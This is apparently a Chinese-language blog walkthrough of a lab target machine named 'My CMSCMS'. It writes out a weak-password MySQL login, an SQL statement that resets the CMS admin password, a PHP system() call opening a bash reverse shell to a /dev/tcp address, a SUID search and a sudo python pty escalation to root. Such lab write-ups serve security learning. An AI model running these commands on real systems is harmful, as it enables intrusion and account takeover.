打靶-My Cmscms
打靶-My cmscms
前言
靶机ip:192.168.0.109
kali IP:192.168.0.106
Goal: Get the root flag of the target.
渗透过程
TScan扫描一下
先看80,好熟悉的界面,以前NKCTF做过,先去看看以前的题,记得当时是个后台文件上传RCE
尝试密码无果,去测试一下mysql有没有弱密码
好家伙直接弱密码
1 | mysql -uroot -p -h 192.168.0.109 |
包意思,中途连sql不知道咋了虚拟机炸了,直接换了一个
fb67c6d24e756229aab021cea7605fb3
本来想直接MD5解密网站偷懒,没想到不行,只能换一种方法了,更改密码
网上应该会有用这个cms忘记密码改密码的过程
果然,直接改为123456
1 | update cms_users set password = (select md5(CONCAT(IFNULL((SELECT sitepref_value FROM cms_siteprefs WHERE sitepref_name = 'sitemask'),''),'123456'))) where username = 'admin'; |
之后再去登录就是之前文件上传RCE了
好了后面尝试了没成功
没权限创建写文件,创建文件夹
后面发现这里可以改配置
1 | system("bash -c 'bash -i>& /dev/tcp/192.168.0.110/9999 0>&1'"); |
反弹过来就是提权了
先看看什么可用
1 | find / -perm -u=s -exec ls -al {} \; 2> /dev/null |
发现有个用户armour,其中binary.sh
在当前目录下也就是/var/www/html/admin发现有个隐藏文件
查看发现是TUZaRzIzM1ZPSTVGRzJESk1WV0dJUUJSR0laUT09PT0=
巧了吗不是用户名密码
直接切换用户
armour:Shield@123
切换之后看看sudo -l
这直接python起bash就行了
sudo python3 -c ‘import pty;pty.spawn(“/bin/bash”)’
价格sudo
总结
本来挺简单一个靶场,被我破kali卡了好久,气死了,起的我直接删了,妈的
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 晴川's Blog🌈!